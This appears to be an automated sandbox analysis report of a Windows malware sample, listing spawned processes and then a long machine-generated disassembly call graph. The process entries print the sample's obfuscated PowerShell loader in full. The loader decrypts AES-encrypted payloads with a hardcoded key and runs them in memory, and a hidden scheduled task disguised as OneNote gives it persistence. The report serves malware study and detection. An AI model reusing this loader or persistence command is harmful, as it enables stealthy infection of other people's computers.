                                    General

                                    Target ID:17
                                    Start time:03:19:43
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:03:19:43
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:03:19:43
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:20
                                    Start time:03:19:44
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:21
                                    Start time:03:19:44
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:03:19:44
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:23
                                    Start time:03:19:45
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:03:19:59
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:03:19:59
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:03:20:30
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:28
                                    Start time:03:20:30
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:11.5%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:28%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:23
                                      execution_graph 28276 7ff65a38beac 28283 7ff65a38bbb4 28276->28283 28288 7ff65a38d3c0 35 API calls 3 library calls 28283->28288 28285 7ff65a38bbbf 28289 7ff65a38cfe8 35 API calls abort 28285->28289 28288->28285 27823 7ff65a38114f 27824 7ff65a381082 27823->27824 27825 7ff65a381880 _com_raise_error 14 API calls 27824->27825 27825->27824 27831 7ff65a380360 27832 7ff65a380417 27831->27832 27833 7ff65a38039f 27831->27833 27835 7ff65a36aaa0 48 API calls 27832->27835 27834 7ff65a36aaa0 48 API calls 27833->27834 27836 7ff65a3803b3 27834->27836 27837 7ff65a38042b 27835->27837 27838 7ff65a36da14 48 API calls 27836->27838 27839 7ff65a36da14 48 API calls 27837->27839 27841 7ff65a3803c2 BuildCatchObjectHelperInternal 27838->27841 27839->27841 27840 7ff65a351fa0 31 API calls 27842 7ff65a3804c1 27840->27842 27841->27840 27843 7ff65a38054c 27841->27843 27844 7ff65a380546 27841->27844 27845 7ff65a35250c SetDlgItemTextW 27842->27845 27847 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27843->27847 27846 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27844->27846 27848 7ff65a3804d6 SetDlgItemTextW 27845->27848 27846->27843 27849 7ff65a380552 27847->27849 27850 7ff65a38051c 27848->27850 27851 7ff65a3804ef 27848->27851 27852 7ff65a3822a0 _handle_error 8 API calls 27850->27852 27851->27850 27854 7ff65a380541 27851->27854 27853 7ff65a38052f 27852->27853 27855 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 27854->27855 27855->27844 28270 7ff65a382070 28271 7ff65a382086 _com_error::_com_error 28270->28271 28272 7ff65a383ff8 std::_Xinvalid_argument 2 API calls 28271->28272 28273 7ff65a382097 28272->28273 28274 7ff65a381880 _com_raise_error 14 API calls 28273->28274 28275 7ff65a3820e3 28274->28275 25453 7ff65a381411 25454 7ff65a381349 25453->25454 25455 7ff65a381880 _com_raise_error 14 API calls 25454->25455 25456 7ff65a381388 25455->25456 25457 7ff65a37b110 25800 7ff65a35255c 25457->25800 25459 7ff65a37b15b 25460 7ff65a37be13 25459->25460 25461 7ff65a37b16f 25459->25461 25613 7ff65a37b18c 25459->25613 26086 7ff65a37f310 25460->26086 25465 7ff65a37b25b 25461->25465 25466 7ff65a37b17f 25461->25466 25461->25613 25472 7ff65a37b311 25465->25472 25477 7ff65a37b275 25465->25477 25470 7ff65a37b229 25466->25470 25471 7ff65a37b187 25466->25471 25467 7ff65a37be3a IsDlgButtonChecked 25468 7ff65a37be49 25467->25468 25474 7ff65a37be55 SendDlgItemMessageW 25468->25474 25475 7ff65a37be70 GetDlgItem IsDlgButtonChecked 25468->25475 25476 7ff65a37b24b EndDialog 25470->25476 25470->25613 25480 7ff65a36aaa0 48 API calls 25471->25480 25471->25613 25808 7ff65a3522bc GetDlgItem 25472->25808 25474->25475 26105 7ff65a36629c GetCurrentDirectoryW 25475->26105 25476->25613 25481 7ff65a36aaa0 48 API calls 25477->25481 25483 7ff65a37b1b6 25480->25483 25484 7ff65a37b293 SetDlgItemTextW 25481->25484 25482 7ff65a37bec7 GetDlgItem 26115 7ff65a352520 25482->26115 26119 7ff65a351ec4 34 API calls _handle_error 25483->26119 25485 7ff65a37b2a6 25484->25485 25494 7ff65a37b2c0 GetMessageW 25485->25494 25485->25613 25488 7ff65a37b388 GetDlgItem 25489 7ff65a37b3a2 IsDlgButtonChecked IsDlgButtonChecked 25488->25489 25490 7ff65a37b3cf SetFocus 25488->25490 25489->25490 25495 7ff65a37b3e5 25490->25495 25496 7ff65a37b472 25490->25496 25493 7ff65a37b1c6 25499 7ff65a37b1dc 25493->25499 26120 7ff65a35250c 25493->26120 25502 7ff65a37b2de IsDialogMessageW 25494->25502 25494->25613 25503 7ff65a36aaa0 48 API calls 25495->25503 25822 7ff65a358d04 25496->25822 25497 7ff65a37b35a 25505 7ff65a351fa0 31 API calls 25497->25505 25514 7ff65a37c2e3 25499->25514 25499->25613 25502->25485 25509 7ff65a37b2f3 TranslateMessage DispatchMessageW 25502->25509 25510 7ff65a37b3ef 25503->25510 25504 7ff65a37bc45 25511 7ff65a36aaa0 48 API calls 25504->25511 25505->25613 25508 7ff65a37b4ac 25832 7ff65a37ef00 25508->25832 25509->25485 26123 7ff65a35129c 25510->26123 25515 7ff65a37bc56 SetDlgItemTextW 25511->25515 26180 7ff65a387884 25514->26180 25518 7ff65a36aaa0 48 API calls 25515->25518 25524 7ff65a37bc88 25518->25524 25541 7ff65a35129c 33 API calls 25524->25541 25525 7ff65a37c2e8 25534 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25525->25534 25528 7ff65a37b418 25532 7ff65a37f024 24 API calls 25528->25532 25539 7ff65a37b425 25532->25539 25542 7ff65a37c2ee 25534->25542 25539->25525 25562 7ff65a37b468 25539->25562 25568 7ff65a37bcb1 25541->25568 25546 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25542->25546 25553 7ff65a37c2f4 25546->25553 25552 7ff65a37bd5a 25555 7ff65a36aaa0 48 API calls 25552->25555 25573 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25553->25573 25563 7ff65a37bd64 25555->25563 25558 7ff65a351fa0 31 API calls 25566 7ff65a37b506 25558->25566 25561 7ff65a37b56c 25571 7ff65a37b59a 25561->25571 26134 7ff65a363268 25561->26134 25562->25561 26133 7ff65a37fa00 33 API calls 2 library calls 25562->26133 25583 7ff65a35129c 33 API calls 25563->25583 25566->25542 25566->25562 25568->25552 25578 7ff65a35129c 33 API calls 25568->25578 25870 7ff65a362f18 25571->25870 25577 7ff65a37c2fa 25573->25577 25589 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25577->25589 25584 7ff65a37bcff 25578->25584 25590 7ff65a37bd8d 25583->25590 25592 7ff65a36aaa0 48 API calls 25584->25592 25587 7ff65a37b5cc 25882 7ff65a367f84 25587->25882 25588 7ff65a37b5b4 GetLastError 25588->25587 25596 7ff65a37c300 25589->25596 25607 7ff65a35129c 33 API calls 25590->25607 25597 7ff65a37bd0a 25592->25597 25594 7ff65a37b58e 26137 7ff65a379d10 12 API calls _handle_error 25594->26137 25606 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25596->25606 25602 7ff65a351150 33 API calls 25597->25602 25600 7ff65a37b5de 25604 7ff65a37b5e5 GetLastError 25600->25604 25605 7ff65a37b5f4 25600->25605 25608 7ff65a37bd22 25602->25608 25604->25605 25614 7ff65a37b60b GetTickCount 25605->25614 25615 7ff65a37b6ab 25605->25615 25703 7ff65a37b69c 25605->25703 25610 7ff65a37c306 25606->25610 25611 7ff65a37bdce 25607->25611 26167 7ff65a352034 25608->26167 25616 7ff65a35255c 61 API calls 25610->25616 25625 7ff65a351fa0 31 API calls 25611->25625 26171 7ff65a3822a0 25613->26171 25885 7ff65a354228 25614->25885 25620 7ff65a37b9d0 25615->25620 26138 7ff65a366414 25615->26138 25619 7ff65a37c364 25616->25619 25624 7ff65a37c368 25619->25624 25634 7ff65a37c37d 25619->25634 25635 7ff65a37c409 GetDlgItem SetFocus 25619->25635 25623 7ff65a37b331 EndDialog 25620->25623 26162 7ff65a35bd1c 33 API calls 25620->26162 25621 7ff65a37bd3e 25629 7ff65a351fa0 31 API calls 25621->25629 25623->25497 25643 7ff65a3822a0 _handle_error 8 API calls 25624->25643 25632 7ff65a37bdf8 25625->25632 25638 7ff65a37bd4c 25629->25638 25631 7ff65a37baf9 25648 7ff65a36aaa0 48 API calls 25631->25648 25641 7ff65a351fa0 31 API calls 25632->25641 25633 7ff65a37b9f5 26163 7ff65a351150 25633->26163 25634->25624 25659 7ff65a37c3b4 SendDlgItemMessageW 25634->25659 25639 7ff65a37c43a 25635->25639 25637 7ff65a37b6ce 26150 7ff65a36b8d0 102 API calls 25637->26150 25646 7ff65a351fa0 31 API calls 25638->25646 25654 7ff65a35129c 33 API calls 25639->25654 25640 7ff65a37b63a 25895 7ff65a351fa0 25640->25895 25649 7ff65a37be03 25641->25649 25651 7ff65a37ca17 25643->25651 25646->25552 25656 7ff65a37bb27 SetDlgItemTextW 25648->25656 25657 7ff65a351fa0 31 API calls 25649->25657 25650 7ff65a37ba0a 25658 7ff65a36aaa0 48 API calls 25650->25658 25652 7ff65a37b6e8 25653 7ff65a36da14 48 API calls 25652->25653 25660 7ff65a37b72a GetCommandLineW 25653->25660 25661 7ff65a37c44c 25654->25661 25655 7ff65a37b648 25900 7ff65a3620f4 25655->25900 25662 7ff65a352534 25656->25662 25657->25497 25663 7ff65a37ba17 25658->25663 25664 7ff65a37c3dd EndDialog 25659->25664 25669 7ff65a37c3d4 25659->25669 25665 7ff65a37b7e9 25660->25665 25670 7ff65a37b7cf 25660->25670 26185 7ff65a368098 33 API calls 25661->26185 25667 7ff65a37bb45 SetDlgItemTextW GetDlgItem 25662->25667 25668 7ff65a351150 33 API calls 25663->25668 25664->25624 26155 7ff65a37aad4 33 API calls _handle_error 25665->26155 25674 7ff65a37bb93 25667->25674 25675 7ff65a37bb70 GetWindowLongPtrW SetWindowLongPtrW 25667->25675 25676 7ff65a37ba2a 25668->25676 25669->25664 26151 7ff65a3520b0 25670->26151 25671 7ff65a37c460 25677 7ff65a35250c SetDlgItemTextW 25671->25677 25923 7ff65a37ce08 25674->25923 25675->25674 25681 7ff65a351fa0 31 API calls 25676->25681 25683 7ff65a37c474 25677->25683 25678 7ff65a37b7fa 26156 7ff65a37aad4 33 API calls _handle_error 25678->26156 25688 7ff65a37ba35 25681->25688 25693 7ff65a37c4a6 SendDlgItemMessageW FindFirstFileW 25683->25693 25685 7ff65a37b675 GetLastError 25686 7ff65a37b684 25685->25686 25916 7ff65a362004 25686->25916 25692 7ff65a351fa0 31 API calls 25688->25692 25689 7ff65a37b80b 26157 7ff65a37aad4 33 API calls _handle_error 25689->26157 25691 7ff65a37ce08 160 API calls 25696 7ff65a37bbbc 25691->25696 25697 7ff65a37ba43 25692->25697 25698 7ff65a37c4fb 25693->25698 25792 7ff65a37c984 25693->25792 26073 7ff65a37f8f4 25696->26073 25708 7ff65a36aaa0 48 API calls 25697->25708 25709 7ff65a36aaa0 48 API calls 25698->25709 25699 7ff65a37b81c 26158 7ff65a36b970 102 API calls 25699->26158 25703->25615 25703->25631 25705 7ff65a37b833 26159 7ff65a37fb5c 33 API calls 25705->26159 25706 7ff65a37ca01 25706->25624 25707 7ff65a37ce08 160 API calls 25723 7ff65a37bbea 25707->25723 25712 7ff65a37ba5b 25708->25712 25713 7ff65a37c51e 25709->25713 25711 7ff65a37ca29 25715 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25711->25715 25724 7ff65a35129c 33 API calls 25712->25724 25726 7ff65a35129c 33 API calls 25713->25726 25714 7ff65a37b852 CreateFileMappingW 25718 7ff65a37b8d3 ShellExecuteExW 25714->25718 25719 7ff65a37b891 MapViewOfFile 25714->25719 25720 7ff65a37ca2e 25715->25720 25716 7ff65a37bc16 26085 7ff65a352298 GetDlgItem EnableWindow 25716->26085 25742 7ff65a37b8f4 25718->25742 26160 7ff65a3835c0 25719->26160 25727 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25720->25727 25721 7ff65a37b375 25721->25504 25721->25623 25723->25716 25725 7ff65a37ce08 160 API calls 25723->25725 25731 7ff65a37ba84 25724->25731 25725->25716 25728 7ff65a37c54d 25726->25728 25729 7ff65a37ca34 25727->25729 25730 7ff65a351150 33 API calls 25728->25730 25735 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25729->25735 25733 7ff65a37c568 25730->25733 25731->25577 25732 7ff65a37bada 25731->25732 25737 7ff65a351fa0 31 API calls 25732->25737 26186 7ff65a35e174 33 API calls 2 library calls 25733->26186 25734 7ff65a37b943 25739 7ff65a37b95c UnmapViewOfFile CloseHandle 25734->25739 25740 7ff65a37b96f 25734->25740 25736 7ff65a37ca3a 25735->25736 25744 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25736->25744 25737->25623 25739->25740 25740->25553 25743 7ff65a37b9a5 25740->25743 25741 7ff65a37c57f 25745 7ff65a351fa0 31 API calls 25741->25745 25742->25734 25749 7ff65a37b931 Sleep 25742->25749 25747 7ff65a351fa0 31 API calls 25743->25747 25746 7ff65a37ca40 25744->25746 25748 7ff65a37c58c 25745->25748 25751 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25746->25751 25750 7ff65a37b9c2 25747->25750 25748->25720 25753 7ff65a351fa0 31 API calls 25748->25753 25749->25734 25749->25742 25752 7ff65a351fa0 31 API calls 25750->25752 25755 7ff65a37ca46 25751->25755 25752->25620 25754 7ff65a37c5f3 25753->25754 25756 7ff65a35250c SetDlgItemTextW 25754->25756 25758 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25755->25758 25757 7ff65a37c607 FindClose 25756->25757 25759 7ff65a37c717 SendDlgItemMessageW 25757->25759 25760 7ff65a37c623 25757->25760 25761 7ff65a37ca4c 25758->25761 25763 7ff65a37c74b 25759->25763 26187 7ff65a37a24c 10 API calls _handle_error 25760->26187 25766 7ff65a36aaa0 48 API calls 25763->25766 25764 7ff65a37c646 25765 7ff65a36aaa0 48 API calls 25764->25765 25767 7ff65a37c64f 25765->25767 25768 7ff65a37c758 25766->25768 25769 7ff65a36da14 48 API calls 25767->25769 25770 7ff65a35129c 33 API calls 25768->25770 25773 7ff65a37c66c BuildCatchObjectHelperInternal 25769->25773 25772 7ff65a37c787 25770->25772 25771 7ff65a351fa0 31 API calls 25774 7ff65a37c703 25771->25774 25775 7ff65a351150 33 API calls 25772->25775 25773->25729 25773->25771 25777 7ff65a35250c SetDlgItemTextW 25774->25777 25776 7ff65a37c7a2 25775->25776 26188 7ff65a35e174 33 API calls 2 library calls 25776->26188 25777->25759 25779 7ff65a37c7b9 25780 7ff65a351fa0 31 API calls 25779->25780 25781 7ff65a37c7c5 BuildCatchObjectHelperInternal 25780->25781 25782 7ff65a351fa0 31 API calls 25781->25782 25783 7ff65a37c7ff 25782->25783 25784 7ff65a351fa0 31 API calls 25783->25784 25785 7ff65a37c80c 25784->25785 25785->25736 25786 7ff65a351fa0 31 API calls 25785->25786 25787 7ff65a37c873 25786->25787 25788 7ff65a35250c SetDlgItemTextW 25787->25788 25789 7ff65a37c887 25788->25789 25789->25792 26189 7ff65a37a24c 10 API calls _handle_error 25789->26189 25791 7ff65a37c8b2 25793 7ff65a36aaa0 48 API calls 25791->25793 25792->25624 25792->25706 25792->25711 25792->25755 25794 7ff65a37c8bc 25793->25794 25795 7ff65a36da14 48 API calls 25794->25795 25797 7ff65a37c8d9 BuildCatchObjectHelperInternal 25795->25797 25796 7ff65a351fa0 31 API calls 25798 7ff65a37c970 25796->25798 25797->25746 25797->25796 25799 7ff65a35250c SetDlgItemTextW 25798->25799 25799->25792 25801 7ff65a35256a 25800->25801 25802 7ff65a3525d0 25800->25802 25801->25802 26190 7ff65a36a46c 25801->26190 25802->25459 25804 7ff65a35258f 25804->25802 25805 7ff65a3525a4 GetDlgItem 25804->25805 25805->25802 25806 7ff65a3525b7 25805->25806 25806->25802 25807 7ff65a3525be SetDlgItemTextW 25806->25807 25807->25802 25809 7ff65a3522fc 25808->25809 25810 7ff65a352334 25808->25810 25812 7ff65a35129c 33 API calls 25809->25812 26289 7ff65a3523f8 GetWindowTextLengthW 25810->26289 25813 7ff65a35232a BuildCatchObjectHelperInternal 25812->25813 25814 7ff65a351fa0 31 API calls 25813->25814 25817 7ff65a352389 25813->25817 25814->25817 25815 7ff65a3523c8 25816 7ff65a3822a0 _handle_error 8 API calls 25815->25816 25818 7ff65a3523dd 25816->25818 25817->25815 25819 7ff65a3523f0 25817->25819 25818->25488 25818->25623 25818->25721 25820 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25819->25820 25821 7ff65a3523f5 25820->25821 25823 7ff65a358de8 25822->25823 25824 7ff65a358d34 25822->25824 26334 7ff65a352004 33 API calls std::_Xinvalid_argument 25823->26334 25827 7ff65a358de3 25824->25827 25828 7ff65a358d91 25824->25828 25830 7ff65a358d42 BuildCatchObjectHelperInternal 25824->25830 26333 7ff65a351f80 33 API calls 3 library calls 25827->26333 25828->25830 25831 7ff65a382150 33 API calls 25828->25831 25830->25508 25831->25830 25836 7ff65a37ef30 25832->25836 25833 7ff65a37ef57 25834 7ff65a3822a0 _handle_error 8 API calls 25833->25834 25835 7ff65a37b4b7 25834->25835 25846 7ff65a36aaa0 25835->25846 25836->25833 26335 7ff65a35bd1c 33 API calls 25836->26335 25838 7ff65a37efaa 25839 7ff65a351150 33 API calls 25838->25839 25840 7ff65a37efbf 25839->25840 25842 7ff65a351fa0 31 API calls 25840->25842 25844 7ff65a37efcf BuildCatchObjectHelperInternal 25840->25844 25841 7ff65a351fa0 31 API calls 25843 7ff65a37eff6 25841->25843 25842->25844 25845 7ff65a351fa0 31 API calls 25843->25845 25844->25841 25845->25833 25847 7ff65a36aab3 25846->25847 26336 7ff65a369734 25847->26336 25850 7ff65a36ab18 LoadStringW 25851 7ff65a36ab46 25850->25851 25852 7ff65a36ab31 LoadStringW 25850->25852 25853 7ff65a36da14 25851->25853 25852->25851 26355 7ff65a36d7f0 25853->26355 25856 7ff65a37f024 26389 7ff65a37ad9c PeekMessageW 25856->26389 25859 7ff65a37f0c3 IsDlgButtonChecked IsDlgButtonChecked 25860 7ff65a37f109 25859->25860 25861 7ff65a37f124 IsDlgButtonChecked 25859->25861 25860->25861 25864 7ff65a37f146 IsDlgButtonChecked IsDlgButtonChecked 25861->25864 25865 7ff65a37f143 25861->25865 25862 7ff65a37f075 25863 7ff65a37f081 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 25862->25863 25863->25859 25866 7ff65a37f198 IsDlgButtonChecked 25864->25866 25867 7ff65a37f173 IsDlgButtonChecked 25864->25867 25865->25864 25868 7ff65a3822a0 _handle_error 8 API calls 25866->25868 25867->25866 25869 7ff65a37b4f8 25868->25869 25869->25558 25873 7ff65a362f4e 25870->25873 25877 7ff65a36305d 25870->25877 25871 7ff65a3822a0 _handle_error 8 API calls 25872 7ff65a363073 25871->25872 25872->25587 25872->25588 25874 7ff65a363037 25873->25874 25876 7ff65a35129c 33 API calls 25873->25876 25879 7ff65a363088 25873->25879 26394 7ff65a363644 25873->26394 25875 7ff65a363644 56 API calls 25874->25875 25874->25877 25875->25877 25876->25873 25877->25871 25880 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25879->25880 25881 7ff65a36308d 25880->25881 25883 7ff65a367f92 SetCurrentDirectoryW 25882->25883 25884 7ff65a367f8f 25882->25884 25883->25600 25884->25883 25886 7ff65a354255 25885->25886 25887 7ff65a35426a 25886->25887 25888 7ff65a35129c 33 API calls 25886->25888 25889 7ff65a3822a0 _handle_error 8 API calls 25887->25889 25888->25887 25890 7ff65a3542a1 25889->25890 25891 7ff65a353c84 25890->25891 25892 7ff65a353cab 25891->25892 26542 7ff65a35710c 25892->26542 25894 7ff65a353cbb BuildCatchObjectHelperInternal 25894->25640 25896 7ff65a351fb3 25895->25896 25897 7ff65a351fdc 25895->25897 25896->25897 25898 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25896->25898 25897->25655 25899 7ff65a352000 25898->25899 25902 7ff65a36212a 25900->25902 25901 7ff65a36215e 25904 7ff65a36223f 25901->25904 25905 7ff65a3669cc 49 API calls 25901->25905 25902->25901 25903 7ff65a362171 CreateFileW 25902->25903 25903->25901 25906 7ff65a36226f 25904->25906 25909 7ff65a3520b0 33 API calls 25904->25909 25908 7ff65a3621c9 25905->25908 25907 7ff65a3822a0 _handle_error 8 API calls 25906->25907 25910 7ff65a362284 25907->25910 25911 7ff65a3621cd CreateFileW 25908->25911 25912 7ff65a362206 25908->25912 25909->25906 25910->25685 25910->25686 25911->25912 25912->25904 25913 7ff65a362298 25912->25913 25914 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 25913->25914 25915 7ff65a36229d 25914->25915 25917 7ff65a36202f 25916->25917 25918 7ff65a36201e 25916->25918 25918->25917 25919 7ff65a36202a 25918->25919 25920 7ff65a362031 25918->25920 26554 7ff65a3622a0 25919->26554 26558 7ff65a362090 25920->26558 26565 7ff65a37a988 25923->26565 25925 7ff65a37d16e 25926 7ff65a351fa0 31 API calls 25925->25926 25927 7ff65a37d177 25926->25927 25929 7ff65a3822a0 _handle_error 8 API calls 25927->25929 25928 7ff65a36d1e8 33 API calls 26072 7ff65a37ce83 BuildCatchObjectHelperInternal 25928->26072 25930 7ff65a37bbab 25929->25930 